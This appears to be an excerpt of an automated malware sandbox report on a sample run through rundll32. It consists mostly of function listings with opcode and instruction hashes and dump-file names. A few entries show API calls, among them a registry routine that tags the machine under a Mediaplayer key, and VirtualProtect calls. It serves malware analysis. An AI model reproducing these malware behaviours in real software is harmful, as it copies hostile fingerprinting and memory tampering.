                    • Opcode ID: c7407f941d4c74cb040ae4ce0a4a9bba9818c1a7567aa36e8ff735851437ed55
                    • Instruction ID: f4747e4569edf10420e5cd3a0d89faadd3911146424886e899462400c8b21188
                    • Opcode Fuzzy Hash: c7407f941d4c74cb040ae4ce0a4a9bba9818c1a7567aa36e8ff735851437ed55
                    • Instruction Fuzzy Hash: 99828D716183828FD775DF28C880BEAB7E1FFD9700F148A6DD4998B684D734A945CB82
                    Function 0695D780 Relevance: .8, Instructions: 790COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c062da6598e3b0fe46d53e04999697dbd20f808960d1eace4ef2c6bb69bf4223
                    • Instruction ID: b2f2ce637f941d6cadeb488172e902518f1de5b5a869e92d4dae13b31bdc1c9a
                    • Opcode Fuzzy Hash: c062da6598e3b0fe46d53e04999697dbd20f808960d1eace4ef2c6bb69bf4223
                    • Instruction Fuzzy Hash: 5972B1716083828FC779CF28C991BAAF7E9FFC4214F154A6DE499C7691E730AA05CB41
                    Function 06982C90 Relevance: .7, Instructions: 706COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9f0d5f908c8025f6d23db3a9ed2855574673696e379e45ee76fbd76dd309c087
                    • Instruction ID: 1e859f6733a57b2445657ccf90d78d6378607ed80011f64e2a39914f763cca4f
                    • Opcode Fuzzy Hash: 9f0d5f908c8025f6d23db3a9ed2855574673696e379e45ee76fbd76dd309c087
                    • Instruction Fuzzy Hash: 76627072A193908FE374DF29C580B9BB7E2BFC5314F25CA5DC4895B659DB306806CB82
                    Function 069712F0 Relevance: .7, Instructions: 667COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 76a41e671535f02a9b85c21c1730c250c767e9977917a01864c87b9c3f8dd8d2
                    • Instruction ID: 5e828b94bad0fd3fbc801e87c9f86d7b0e2791d1bbd933f345720321109ee78d
                    • Opcode Fuzzy Hash: 76a41e671535f02a9b85c21c1730c250c767e9977917a01864c87b9c3f8dd8d2
                    • Instruction Fuzzy Hash: B632E576B547118FD728CF29CC8169AB7E6BBC8314F09962DE949D7794EB34EC018B80
                    Function 06932BD6 Relevance: .6, Instructions: 573COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7f9a083ff9e7b3146d1927e2773ece21a56870f47b4529c7f7d8667f39756a11
                    • Instruction ID: 20324ee13fed95cfb1f625da27fdff9ed8d66d180527a30184155cac8384ad2d
                    • Opcode Fuzzy Hash: 7f9a083ff9e7b3146d1927e2773ece21a56870f47b4529c7f7d8667f39756a11
                    • Instruction Fuzzy Hash: E222E87BA147118FD728CF29C4D16E9F7E3BBC8304F1A9A2DC54ADB254DE70A9058B81
                    Function 06932E4E Relevance: .6, Instructions: 564COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8bdc383369ef8b4f007e95c6c0c6e3e50422dad25f80981c0063e7e6288364c8
                    • Instruction ID: fbd0ecf79c5c5c668b1613b68abf8a84f62ddac1c49de4e4d36b238da322906f
                    • Opcode Fuzzy Hash: 8bdc383369ef8b4f007e95c6c0c6e3e50422dad25f80981c0063e7e6288364c8
                    • Instruction Fuzzy Hash: 0922077B6146418FD728CF29C4D17E9F7E7BBC8304F099A2EC54ADB254DE70A9098B41
                    Function 06933665 Relevance: .5, Instructions: 452COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cb52afe770044142d15ff4e0c60e65ac0156b0cfde0b66927e1251c6c4cabee0
                    • Instruction ID: cf6fd9852e1f95a1b215bde4bf9fda601c9a2768cc97883be62ba282fca6bf98
                    • Opcode Fuzzy Hash: cb52afe770044142d15ff4e0c60e65ac0156b0cfde0b66927e1251c6c4cabee0
                    • Instruction Fuzzy Hash: 0702E37B6146428FD728CF29C4D17EAF7E3BBC8304F1A9A2DC54ACB254DE70A9058B41
                    Function 06931290 Relevance: .4, Instructions: 445COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c056a06045740e466628fc760b63a346be28fb38a5535187cf83b0583fda3bd5
                    • Instruction ID: 5f6fc50b72033f2b2906608904f7f18135611fedd33a369987710c6bb8c833c7
                    • Opcode Fuzzy Hash: c056a06045740e466628fc760b63a346be28fb38a5535187cf83b0583fda3bd5
                    • Instruction Fuzzy Hash: 06027272A183518FD764CF29C980ADAB7E7FFC9310F15CA6DD4899B658DB30A805CB81
                    Function 069335BB Relevance: .4, Instructions: 444COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f8ae1f8f6f82691a65ee37a3a6607d9eec0228ba0af7dcc7c84eb005ad04ffaa
                    • Instruction ID: e0143c3ed9d17d9fadca57d8f18431b62e38ac7eb23e80b44ed37c2136fa4a20
                    • Opcode Fuzzy Hash: f8ae1f8f6f82691a65ee37a3a6607d9eec0228ba0af7dcc7c84eb005ad04ffaa
                    • Instruction Fuzzy Hash: 4E02E37B6146428FD728CF29C4D17EAF7E7BBC8304F1A9A2DC54ACB254DE70A9058B41
                    Function 06933611 Relevance: .4, Instructions: 443COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b07b9ff2d8e7a88fc2b1dba46dd7f5ec85a4d66292d36f8c047f2ddde2707f73
                    • Instruction ID: 2f37c5102e63e890322ad4c3f127b00bde509ed86a762070bdbf6e38cb1f8de5
                    • Opcode Fuzzy Hash: b07b9ff2d8e7a88fc2b1dba46dd7f5ec85a4d66292d36f8c047f2ddde2707f73
                    • Instruction Fuzzy Hash: 8F02D57B6146428FD728CF29C4D17EAF3E7BBC8304F1A9A2DC54ADB254DE70A9058B41
                    Function 069336DC Relevance: .4, Instructions: 442COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3182e9a5518bf684797ecb04a513659354d3e2065038d8d00c71ce3747ac7883
                    • Instruction ID: 081ea502ce1c25efef2fdb586c40447237d31f0c786ee131ed2962aa9fe8c841
                    • Opcode Fuzzy Hash: 3182e9a5518bf684797ecb04a513659354d3e2065038d8d00c71ce3747ac7883
                    • Instruction Fuzzy Hash: 3E02D37B6146428FD728CF29C4D17EAF3E7BBC8304F1A9A2DC54ADB254DE70A9058B41
                    Function 0693327A Relevance: .4, Instructions: 442COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 996fd846cc2d5e8c03b16005e0dac272f1c0042d2df993f698aad1d8ebc0b08c
                    • Instruction ID: f98703834d1e2563f02ddde31663d1ae3ffb26a2453cf1c468363455531c4326
                    • Opcode Fuzzy Hash: 996fd846cc2d5e8c03b16005e0dac272f1c0042d2df993f698aad1d8ebc0b08c
                    • Instruction Fuzzy Hash: 6102E47B6146428FD728CF29C4D17EAF3E7BBC8304F1A9A2DC54ADB254DE70A9058B41
                    Function 069332CE Relevance: .4, Instructions: 441COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9b0f53764ed9d4ea91acee7e5563f2a1230a0977720db5a51191d69376be7394
                    • Instruction ID: b877eef91e319ef7cafa49437b271963ed4280dd32d23eab96fa13b59837fe4f
                    • Opcode Fuzzy Hash: 9b0f53764ed9d4ea91acee7e5563f2a1230a0977720db5a51191d69376be7394
                    • Instruction Fuzzy Hash: 3E02E37B6146428FD728CF29C4D17EAF3E7BBC8304F1A9A2DC54ADB254DE70A9058B41
                    Function 0693338A Relevance: .4, Instructions: 440COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 304280c842d744de43e7b2bd1868159c95e4d1305791e4ff8101ee3412d34d39
                    • Instruction ID: e5a2d38e3396c7ab0fff9b0f8265cf6ebc3a9966b88812f3492fc9ebed6163b6
                    • Opcode Fuzzy Hash: 304280c842d744de43e7b2bd1868159c95e4d1305791e4ff8101ee3412d34d39
                    • Instruction Fuzzy Hash: E702D37B6146428FD738CF29C4D17EAF3E6BBC8304F1A9A2DC54ADB254DE70A9058B41
                    Function 0693308E Relevance: .4, Instructions: 437COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf14989778690acbe22859f824514b8a1b951b230a99b12940bf1d6f01d727e0
                    • Instruction ID: b9d0e031175e1bd3c7e1182c21ffe5091fa28e6a1244411e18e5c39b7fd69eba
                    • Opcode Fuzzy Hash: bf14989778690acbe22859f824514b8a1b951b230a99b12940bf1d6f01d727e0
                    • Instruction Fuzzy Hash: 23F1C47B6186428FD728CF29C4D17EAF7E7BBC8304F199A2DC54ACB254DE70A9058B41
                    Function 06932DC0 Relevance: .4, Instructions: 436COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 931da559f50516af19c9e5184bcebc0888389b9844ac6ff3553bcd4a6cb70738
                    • Instruction ID: 916554ee7d686fdef4d77105392a4b319ba0c69822b8f4b6a555eb00fc2613c3
                    • Opcode Fuzzy Hash: 931da559f50516af19c9e5184bcebc0888389b9844ac6ff3553bcd4a6cb70738
                    • Instruction Fuzzy Hash: 1DF1C47B6186428FD728CF29C4D17EAF7E7BBC8304F199A2DC54ACB254DE70A9058B41
                    Function 069330CB Relevance: .4, Instructions: 436COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ce1965fbdb9ca5755f499d30d2c594cd11e1404cd51a19b21cb1289ed9e15a87
                    • Instruction ID: 37847aa2b29ceeaf4ba164ca730179df6332df1ea53f410c8ea7182fee58c666
                    • Opcode Fuzzy Hash: ce1965fbdb9ca5755f499d30d2c594cd11e1404cd51a19b21cb1289ed9e15a87
                    • Instruction Fuzzy Hash: 71F1C47B6186428FD728CF29C4D17EAF7E7BBC8304F199A2DC54ACB254DE70A9058B41
                    Function 06932DFE Relevance: .4, Instructions: 436COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7220935e7163158e0975ef55672cd876e209d44f219cab9008d71f63763aa691
                    • Instruction ID: f724e6d01fa883a31d165ce05c0bdcce28246abf560f82bdbac5ddf9039ed751
                    • Opcode Fuzzy Hash: 7220935e7163158e0975ef55672cd876e209d44f219cab9008d71f63763aa691
                    • Instruction Fuzzy Hash: 90F1C47B6186428FD728CF29C4D17EAF7E7BBC8304F199A2DC54ACB254DE70A9058B41
                    Function 06933028 Relevance: .4, Instructions: 436COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7d9db2e290771e7e873f1cbfac565b06d1e5d5da07d9cb4e9075704fce29a0bf
                    • Instruction ID: 04ae65a356773cd99fb4c3bb2fd453b4c1426e6a328d22b853298d541ce79b9b
                    • Opcode Fuzzy Hash: 7d9db2e290771e7e873f1cbfac565b06d1e5d5da07d9cb4e9075704fce29a0bf
                    • Instruction Fuzzy Hash: C3F1C37B6146428FD728CF29C4D17EAF7E7BBC8304F1A9A2DC54ACB254DE70A9058B41
                    Function 06933358 Relevance: .4, Instructions: 436COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1205ca558f58d5d1d6bfcb825542d6b2473180edc6544f24a63e8b972e814fc4
                    • Instruction ID: 637774245cb97f9b757be31b3d53e80a11312d25519bc8f30f3bec7d211f8f01
                    • Opcode Fuzzy Hash: 1205ca558f58d5d1d6bfcb825542d6b2473180edc6544f24a63e8b972e814fc4
                    • Instruction Fuzzy Hash: 77F1C37B6186428FD728CF29C4D17EAF7E7BBC8304F199A2DC54ACB254DE70A9058B41
                    Function 069333D5 Relevance: .4, Instructions: 435COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 060f2c1ab4a77ff1dd786f584579786f51474fd7d5cee65806832cf0faa5f302
                    • Instruction ID: 6b6801aa6857a4b96788788921bef61d15312d3246816dba534f077b2af1351f
                    • Opcode Fuzzy Hash: 060f2c1ab4a77ff1dd786f584579786f51474fd7d5cee65806832cf0faa5f302
                    • Instruction Fuzzy Hash: 42F1C37BA146428FD728CF29C4D17EAF7E7BBC8304F199A2DC54ACB254DE70A9058B41
                    Function 06933322 Relevance: .4, Instructions: 435COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3a6711e7f3f71b7fb4e115943aed02857f4736b7005ef871c53fe014674cd67a
                    • Instruction ID: d16d845bfe842476e99d9eb474736832b325be0861f71fd81e556c328342814c
                    • Opcode Fuzzy Hash: 3a6711e7f3f71b7fb4e115943aed02857f4736b7005ef871c53fe014674cd67a
                    • Instruction Fuzzy Hash: FEF1C37B6186428FD728CF29C4D17EAF7E7BBC8304F199A2DC54ACB254DE70A9058B41
                    Function 06933055 Relevance: .4, Instructions: 434COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ba666a08a3c0407ae3e6109bbfcb85e963084c977373df8412646c62b1add27a
                    • Instruction ID: cf2c7745070a3ace66e73cd5ee06fd316d43d31797006acdee5d34297cb883d9
                    • Opcode Fuzzy Hash: ba666a08a3c0407ae3e6109bbfcb85e963084c977373df8412646c62b1add27a
                    • Instruction Fuzzy Hash: 0CF1C37B6146428FD728CF29C4D17EAF7E6BBC8304F199A2DC54ACB254DE70A9058B41
                    Function 06933106 Relevance: .4, Instructions: 433COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b8042a0354b4711df86b18f5d72ed0b9a03f1ba63933ac7bbb74d864a64537c4
                    • Instruction ID: a1d93b0ec1cb6a6d38c2d4e8c697127cafaad716838bd7ad8e18777197e46bf5
                    • Opcode Fuzzy Hash: b8042a0354b4711df86b18f5d72ed0b9a03f1ba63933ac7bbb74d864a64537c4
                    • Instruction Fuzzy Hash: 1DF1D37B6146428FD728CF29C4D17EAF7E6BBC8304F1A9A2DC54ACB254DE70A9058B41
                    Function 0696CFC0 Relevance: .4, Instructions: 390COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9313fbbd97f95eee61c8c8f4612d759eedc551c6f7f327ad67ad4c2030e8e542
                    • Instruction ID: 20dd5f9434603bdc931c61ccb4301a46187c61672ed4be1a2b3c702d5b113701
                    • Opcode Fuzzy Hash: 9313fbbd97f95eee61c8c8f4612d759eedc551c6f7f327ad67ad4c2030e8e542
                    • Instruction Fuzzy Hash: 36E1B376B047128FD718CF69C881A96B7E2BFC8314F098929E459DBA44DB74F906CBC0
                    Function 06960EE0 Relevance: .3, Instructions: 299COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b72f3500ab27143d73587d08c4954d1b6218862daa470ebdf882f870314fbbc
                    • Instruction ID: 14f3d68caf903b508937dc84a8ea926465753793926c231212937930a015ff53
                    • Opcode Fuzzy Hash: 5b72f3500ab27143d73587d08c4954d1b6218862daa470ebdf882f870314fbbc
                    • Instruction Fuzzy Hash: D0D16C726083828FD364CF29C880BAAB7E2FFD5314F158A59E499CB655D730E944CB92
                    Function 069689F0 Relevance: .3, Instructions: 294COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f2e5ed6113b0c71b305a2bd196dacf9858f840446acdf067420d4c76fb6cefb9
                    • Instruction ID: d10a419187013a298229b1d159d6e75ff8876dcaa160914dbeb2e0b5819a0b86
                    • Opcode Fuzzy Hash: f2e5ed6113b0c71b305a2bd196dacf9858f840446acdf067420d4c76fb6cefb9
                    • Instruction Fuzzy Hash: 28A17A7BB147004FD308CE2AC99129AF7D7ABD9310F1ED62ED485DB394DA749C068791
                    Function 069852F2 Relevance: .3, Instructions: 275COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 55f25b790993bace6d0a2b19cac95649a91aad1a57ebd9f4e449009c84bf1663
                    • Instruction ID: accdc977d4e71a3ca97a512d6f0895d81d88e4420976bc2b45c3945ba09ac7d9
                    • Opcode Fuzzy Hash: 55f25b790993bace6d0a2b19cac95649a91aad1a57ebd9f4e449009c84bf1663
                    • Instruction Fuzzy Hash: 73910477B547118FD718CE29C8811AAF7E3BBC8310F1A962ED499D7354DE74AC06CA81
                    Function 051B163D Relevance: .3, Instructions: 254COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974409517.00000000051B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 051B1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_51b1000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e90dffc27ac4932d04492c911b58c3b01644892d9c56e9814cf45e1f888d8b46
                    • Instruction ID: c7bf4f9324376f4831b6c2e8689a4f833257a736343a690b3a05ffcba13926ef
                    • Opcode Fuzzy Hash: e90dffc27ac4932d04492c911b58c3b01644892d9c56e9814cf45e1f888d8b46
                    • Instruction Fuzzy Hash: 3181A437B547114BD728CE79CD8429AB6D3ABC8314F1AC63D8949E7748DEB4A8068A80
                    Function 0696BB30 Relevance: .2, Instructions: 199COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6928c3a09929bd641140b3e9af8e2ced4354271718ea13005c5f4ca2d1b71926
                    • Instruction ID: 04f8dfc270bd8da0d6ca705809fa9b5fae2a8af6134275e9af1a6ae11267abc4
                    • Opcode Fuzzy Hash: 6928c3a09929bd641140b3e9af8e2ced4354271718ea13005c5f4ca2d1b71926
                    • Instruction Fuzzy Hash: 5D815A72608351CFD360CF29C880B9BF7E6FF89314F158969E985DB254D730A845CB92
                    Function 27AC18CB Relevance: 4.5, APIs: 3, Instructions: 16synchronizationCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00009088), ref: 27AC18D7
                    • WaitForSingleObject.KERNEL32(00000000), ref: 27AC18DE
                      • Part of subcall function 27AC1120: GetTickCount.KERNEL32 ref: 27AC116C
                      • Part of subcall function 27AC1120: SHGetValueA.SHLWAPI(80000001,SOFTWARE\Microsoft\Mediaplayer,COMPUTERNAME,?,?), ref: 27AC11B9
                      • Part of subcall function 27AC1120: SHSetValueA.SHLWAPI(80000001,SOFTWARE\Microsoft\Mediaplayer,COMPUTERNAME,00000001,?), ref: 27AC11E0
                      • Part of subcall function 27AC1120: UuidCreateSequential.RPCRT4(?), ref: 27AC11F5
                      • Part of subcall function 27AC1120: sprintf.NTDLL ref: 27AC122C
                      • Part of subcall function 27AC1120: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 27AC124F
                      • Part of subcall function 27AC1120: GlobalAlloc.KERNEL32(00000040,00001000,00000000,?,00000000), ref: 27AC1266
                      • Part of subcall function 27AC1120: sprintf.NTDLL ref: 27AC128C
                    • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 27AC18EC
                    Memory Dump Source
                    • Source File: 00000003.00000002.84975565291.0000000027AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 27AC1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_27ac1000_rundll32.jbxd
                    Similarity
                    • API ID: CreateValuesprintf$AllocComputeCountCrc32EventGlobalObjectProcessSequentialSingleTerminateTickUuidWait
                    • String ID:
                    • API String ID: 3103566969-0
                    • Opcode ID: 8dabf4b52cb4f457aca4ebc0624c47dc4196281b91c428161e50fb08894ee4ce
                    • Instruction ID: 63fbabbbf26330366ed9b718a62b1419555281b4622388cdf8ef43b824dd0547
                    • Opcode Fuzzy Hash: 8dabf4b52cb4f457aca4ebc0624c47dc4196281b91c428161e50fb08894ee4ce
                    • Instruction Fuzzy Hash: FAD0C9729021307A916226628C1DCCB2E1CEF2ABB1310031BB529400D0CA2C4882C5F5
                    Function 032E1EB1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 343 32e1eb1-32e1f0d VirtualProtect 344 32e2067-32e208f 343->344 345 32e1fcb-32e2034 call 32e14a3 344->345 346 32e2095 344->346 345->344
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.84973434581.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32e0000_rundll32.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID: X
                    • API String ID: 544645111-3081909835
                    • Opcode ID: d2a3a0994755566863b41518f0ba61358616c682e99c523238f9e6b8a90c07c6
                    • Instruction ID: 1a7f6278e537297cb79d55a5a2fb1773c3c760f7d22b9fefb8273eb00acc4238
                    • Opcode Fuzzy Hash: d2a3a0994755566863b41518f0ba61358616c682e99c523238f9e6b8a90c07c6
                    • Instruction Fuzzy Hash: FE31DEB5E106288FCB48CF58C880A9DFBB1FF48310F5981AAC909A7752D731A991CF90
                    Function 032E1DAB Relevance: 3.1, APIs: 2, Instructions: 128memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.84973434581.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32e0000_rundll32.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 4413c55c9d4a5d079f76e1dea4fceadf34d4ff805702a901d55f62485d103b6e
                    • Instruction ID: 6ae75ec9d40ce435ca59715b37114a4fc4766d8eb2b8d0ae9583c76b3c7bba0f
                    • Opcode Fuzzy Hash: 4413c55c9d4a5d079f76e1dea4fceadf34d4ff805702a901d55f62485d103b6e
